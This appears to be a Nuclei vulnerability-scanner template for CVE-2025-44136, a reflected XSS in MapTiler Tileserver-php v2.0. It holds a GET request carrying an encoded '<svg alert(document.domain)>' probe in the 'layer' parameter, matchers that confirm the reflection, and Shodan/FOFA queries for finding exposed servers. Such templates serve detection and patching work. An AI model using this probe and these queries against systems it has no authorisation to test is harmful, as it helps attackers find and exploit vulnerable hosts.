Description
MapTiler Tileserver-php v2.0 contains a reflected XSS caused by unencoded reflection of the GET parameter \"layer\" in an error message, letting unauthenticated attackers execute arbitrary script on victim browsers.
MapTiler Tileserver-php v2.0 contains a reflected XSS caused by unencoded reflection of the GET parameter \"layer\" in an error message, letting unauthenticated attackers execute arbitrary script on victim browsers.
id: CVE-2025-44136
info:
name: MapTiler Tileserver-php v2.0 - Unauthenticated XSS
author: 0x_Akoko
severity: medium
description: |
MapTiler Tileserver-php v2.0 contains a reflected XSS caused by unencoded reflection of the GET parameter \"layer\" in an error message, letting unauthenticated attackers execute arbitrary script on victim browsers.
impact: |
Unauthenticated attackers can execute arbitrary JavaScript in victim browsers, leading to session hijacking or phishing.
remediation: |
Update to the latest version of MapTiler Tileserver-php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-44136
- https://github.com/mheranco/CVE-2025-44136
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-44136
epss-score: 0.02507
epss-percentile: 0.83943
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: title:"TileServer-php"
fofa-query: title="TileServer-php"
tags: cve,cve2025,xss,maptiler,tileserver,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3Csvg+alert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<svg alert(document.domain)>","Unknown or not specified dataset")'
- 'contains(content_type, "text/html")'
- 'status_code == 404'
condition: and
# digest: 4b0a004830460221008a852997c7682ca809d70ef5e3e6d9fd987f781425898b6458f4e299ee28f3b9022100a9214378f8a7a920e5f62fd743a320fc66da537f9e946649870247f3af6055a2:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.